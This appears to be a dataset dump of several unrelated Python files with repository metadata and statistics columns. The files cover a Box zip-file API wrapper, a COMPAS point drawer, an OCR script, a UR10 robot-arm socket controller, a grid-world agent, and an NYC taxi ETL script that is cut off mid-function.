super(ZipFileInputSet, self)._set_input('ZipFileLocation', value)
def set_ZipFileName(self, value):
"""
Set the value of the ZipFileName input for this Choreo. ((required, string) The name of the zip file that will be created.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileName', value)
class ZipFileResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ZipFile Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((string) The response from Box. This contains the newly created zip file metadata.)
"""
return self._output.get('Response', None)
def get_URL(self):
"""
Retrieve the value for the "URL" output from this Choreo execution. ((string) The url for the newly created zip file.)
"""
return self._output.get('URL', None)
class ZipFileChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ZipFileResultSet(response, path)
| 0
| 0
| 0
| 3,428
| 0
| 0
| 0
| 104
| 204
|
68408fe7a5c1690df451641f4565f48305c8e19c
| 830
|
py
|
Python
|
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
| 23.714286
| 68
| 0.659036
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_ghpython
from compas.artists import PrimitiveArtist
from .artist import GHArtist
class PointArtist(GHArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
"""
def __init__(self, point, **kwargs):
super(PointArtist, self).__init__(primitive=point, **kwargs)
def draw(self):
"""Draw the point.
Returns
-------
:class:`Rhino.Geometry.Point3d`
"""
points = [self._get_args(self.primitive)]
return compas_ghpython.draw_points(points)[0]
@staticmethod
def _get_args(primitive):
return {'pos': list(primitive)}
| 0
| 62
| 0
| 539
| 0
| 0
| 0
| 29
| 90
|
9ec102cb665e7539c5fa44c0ec648ab7542b5df8
| 167
|
py
|
Python
|
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
| 20.875
| 41
| 0.760479
|
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
5e646af002eec7affa6c340d69f3649382ec6a9a
| 17,625
|
py
|
Python
|
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
from ur10_simulation import ur10_simulator
import os.path
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import sys
sys.path.append('../iLimb')
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
| 31.756757
| 198
| 0.549787
|
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
import socket
import numpy as np
from ur10_simulation import ur10_simulator
import time
import struct
import binascii
from copy import copy
import os.path
#-------------------------------------------------------------------------------
class UR10Controller:
def __init__(self, ip,port_recv = 30003, port_send=30002, buffer_size=1024):
self.port_send = port_send
self.port_recv = port_recv
self.ip = ip
self.buffer_size = buffer_size
self.joints = np.zeros((6))
self.xyzR = np.zeros((6))
self.timer_start = time.time()
self.connect()
self.read_start = copy(self.read_time())
self.read_timer = 0
def connect(self):
self.urcont_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_send.connect((self.ip,self.port_send))
self.urcont_recv.connect((self.ip,self.port_recv))
def disconnect(self):
self.urcont_send.close()
def read_time(self):
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(1048)
Time = self.get_xyzR(packet_2)
return Time
def movej(self,posevec,t):
X = 0.001*posevec[0]
Y = 0.001*posevec[1]
Z = 0.001*posevec[2]
Rx = posevec[3]
Ry = posevec[4]
Rz = posevec[5]
cmd = "movej(p[" + str(X) + "," + str(Y) + "," + str(Z) + "," + str(Rx) + "," + str(Ry) + "," + str(Rz) + "], t =" + str(t) + ")\n"
# print(cmd)
# a = input("")
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def movejoint(self,jointvec,t):
cmd = "movej([" + str(jointvec[0]) + "," + str(jointvec[1]) + "," + str(jointvec[2]) + "," + str(jointvec[3]) + "," + str(jointvec[4]) + "," + str(jointvec[5]) + "], t =" + str(t) + ") \n"
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def stopj(self,a = 2):
cmd = "stopj(" + str(a) + ")"
self.urcont_send.send(cmd)
def clear_buffer(self):
#t1 = time.time()
self.timer_current = copy(time.time()) - self.timer_start
t1 = time.time()
while 1:
time.sleep(0.00001)
T = self.read_time()
self.read_timer = T - self.read_start
if self.timer_current - self.read_timer <0.05:
break
#t2 = time.time() - t1
def read_xyz(self):
#time.sleep(0.05)
self.clear_buffer()
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
packet_8 = self.urcont_recv.recv(48)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i<3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def get_joint(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y * (180.0/3.1419)
return val
def get_xyzR(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y
return val
def read_joints(self):
t1 = time.time()
self.clear_buffer()
print("Time to learn",time.time() - t1)
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
useless = self.urcont_recv.recv(760)
def read_joints_and_xyzR(self):
self.clear_buffer()
# time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i < 3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def move_joint_with_constraints(self, joints_vec, dist_pivot):
#joints_vec is in degrees
# self.read_joints_and_xyzR()
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def move_joints_with_grasp_constraints(self, joints_vec, dist_pivot,grasp_pivot,constant_axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def circular_pivot_motion(self, angle, dist_pivot,axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
pivot_new = S1.circular_motion(dist_pivot,angle,axis)
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
return new_xyzR
def do_circular_pivot_motion(self, angle, dist_pivot,axis,t,correction):
Sim = ur10_simulator()
self.read_joints()
wrist1 = copy(self.joints[5])
print("Wrist_old",wrist1)
Sim.set_joints(self.joints)
useless = copy(Sim.joints2pose())
new_xyzR = self.circular_pivot_motion(angle,dist_pivot,axis)
self.movej(new_xyzR,t)
time.sleep(t + 0.2)
self.read_joints()
newjoints = copy(self.joints)
# newjoints[5] = wrist1+correction
newjoints[5] = newjoints[5] + correction
self.movejoint(np.deg2rad(newjoints),2)
time.sleep(2.1)
self.read_joints()
print("Wrist_new",self.joints[5])
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
class URPoseManager():
def __init__(self):
#PROPERTY FOR MANAGING POSES (POSITIONS OR JOINTS)
self.dictKeys = list() #list containing the names of positions/joints
self.dictPosJoints = dict() #dictionary
self.dictRelativePos = dict() #dictionary for relative positions
#MANAGING POSES (POSITIONS OR JOINTS)
#save pose file
#filename should contain the full path for the file
def save(self,filename):
#open the file stream
f = open(filename,'w')
#loop through all the keys
for k in range(len(self.dictKeys)):
key = self.dictKeys[k]
value = self.dictPosJoints[key]
f.write(key + ' ' + value[0] + ' ')
[f.write(str(v)+' ') for v in value[1]]
f.write('\n')
f.close()
#load pose file
#filename should contain the full path for the file
def load(self,filename):
if os.path.isfile(filename):
with open(filename) as f:
lines = f.readlines()
#clear the current keys
self.dictKeys = list()
#clear the current dictionary
self.dictPosJoints = dict()
#for every line, split the string by new line and spaces
#the actual data will be stored as a list where each position
#will correspond to a position/joint in the file
data = [l.split('\n')[0].split(' ') for l in lines]
#save all the dictionary keys
self.dictKeys = [str(d[0]) for d in data]
#update the dictionary
#loop through all the keys
for k in range(len(self.dictKeys)):
print('loop')
posevec = [float(x) for x in data[k][2:8]]
value = [data[k][1],posevec]
self.dictPosJoints[self.dictKeys[k]] = value
#print(self.dictKeys) #debugging
#print(self.dictPosJoints) #debugging
return True #successfuly managed to load the files
else:
return False #could not find the file
#move the UR robot to the specified pose
def moveUR(self,urobj,name,time):
if name in self.dictKeys and name in self.dictPosJoints and isinstance(urobj,UR10Controller):
if self.dictPosJoints[name][0] == 'p':
urobj.movej(self.dictPosJoints[name][1],time)
elif self.dictPosJoints[name][0] == 'j':
urobj.movejoint(self.dictPosJoints[name][1],time)
return True
else:
return False
#get pose names
def getPoseNames(self):
return copy(self.dictKeys)
#get the joint position
def getPosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
return copy(self.dictPosJoints[name][1])
else:
return False #could not find the name
#adding a new position
#WARNING: Adding a new position with the same name will overwrite any
#previous entry
#WARNING: position should be in m!!
#WARNING: joints should be in radians!!
def addPosition(self,name,position):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['p',position]
return True
#adding a new joint
#WARNING: Adding a new joint with the same name will overwrite any
#previous entry
#WARNING: joints should be in radians!!
def addJoint(self,name,joint):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['j',joint]
return True
#removing a position/joint
def removePosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
del(self.dictKeys[self.dictKeys.index(name)])
del(self.dictPosJoints[name])
return True
else:
return False
#this function remaps all the positions that have been saved to a new
#home position. necessary when remapping has changed. as long as it is
#possible to create positions relative to an origin or home position, this
#method can be used to convert all the stored positions to new values
#based on a new origin
#def conv2newHome(self,_home):
# print('ok')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import os,sys
sys.path.append('../iLimb')
from iLimb import *
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
| 0
| 0
| 0
| 13,301
| 0
| 0
| 0
| -34
| 210
|
072d2914c7508a4a27885c88e7923aafdfe723a6
| 4,133
|
py
|
Python
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | 2
|
2020-02-05T04:17:03.000Z
|
2021-05-24T04:07:36.000Z
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
| 33.064
| 140
| 0.581176
|
#!/usr/bin/python
import numpy as np
import IPython
from IPython.core.debugger import set_trace
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
class Agent(object):
"""A base class of an agent whose movement path is generated by using astar alg"""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
self.idx = idx
self.grid_dim = grid_dim
self.x_len, self.y_len = self.grid_dim
self.position = self.rand_position(*self.grid_dim)
self.agt_trans_noise = agent_trans_noise
self.cur_action = None
self.cur_action_time_left = 0.0
self.cur_action_done = True
def step(self, action, goal):
raise NotImplementedError
def astar_move(self, goal):
moves = self.wrap_positions(DIRECTION + self.position)
h = np.linalg.norm(goal-moves, axis=1)
dest_idx = np.random.choice(np.where(h == h.min())[0], size=1)[0]
trans = TRANSLATION_TABLE[dest_idx][np.random.choice(3, p=[self.agt_trans_noise/2, 1-self.agt_trans_noise, self.agt_trans_noise/2])]
self.position = (self.position+trans) % self.x_len
dist = np.linalg.norm(goal - self.position)
if dist < 0.1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
############################################################################
# helper functions
def _get_position_from_one_hot(self, goal):
index = goal.nonzero()[0]
X = index % self.x_len
Y = index // self.x_len
return np.concatenate([X,Y])
def _get_position_from_normalized(self, goal):
if all(goal[2:] == -1):
return goal[2:]
else:
return goal[2:] * self.x_len
@staticmethod
def rand_position(x_range, y_range):
return np.array([np.random.randint(x_range), np.random.randint(y_range)])
def wrap_positions(self, positions):
X, Y = np.split(positions,2,axis=1)
return np.concatenate([X%self.x_len, Y%self.y_len], axis=1)
class Agent_v1(Agent):
"""Move_To_Target macro-action is terminated by reaching the goal.
The low level controller automatically set the latest
obvserved tagrget's position as the goal. If the target is flicked, the
previous target's location is continuely implemented."""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
super(Agent_v1, self).__init__(idx, grid_dim, agent_trans_noise=agent_trans_noise)
self.pre_goal = np.array([-1,-1])
def step(self, action, goal):
"""Depends on the input macro-action to run low-level controller to achieve
primitive action execution.
"""
if self.cur_action_done:
self.cur_action = action
else:
action = self.cur_action
self.cur_action_done = False
self.cur_action_time_left = -1.0
if action == 1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
if len(goal) > len(self.grid_dim) * 2:
goal = self._get_position_from_one_hot(goal[self.x_len*self.y_len:])
else:
goal = self._get_position_from_normalized(goal)
# target is flicked, then move towards the target position in previous obs
if all(goal==-1):
if all(self.pre_goal==-1):
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
self.astar_move(self.pre_goal)
else:
self.astar_move(goal)
self.pre_goal = goal
| 0
| 115
| 0
| 3,379
| 0
| 0
| 0
| 15
| 91
|
87af048da678fa17419acdfe0ee36bfcb3064335
| 4,026
|
py
|
Python
|
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from field import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesytem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
# -- Data Processing: Extract -- #
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is in the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
| 22.617978
| 79
| 0.513164
|
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import etl
import pandas as pd
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from field import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesytem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
def visualize_data(df: pd.DataFrame):
pass
# Debug data frame.
DEBUG and preview(df, visualize_data.__name__)
# Return data frame for reuse.
return df
# -- Data Processing: Extract -- #
def extract_data(config: dict):
# Define an inner function to extract source data files.
def extract_files(type: str):
source.extract_files(
type,
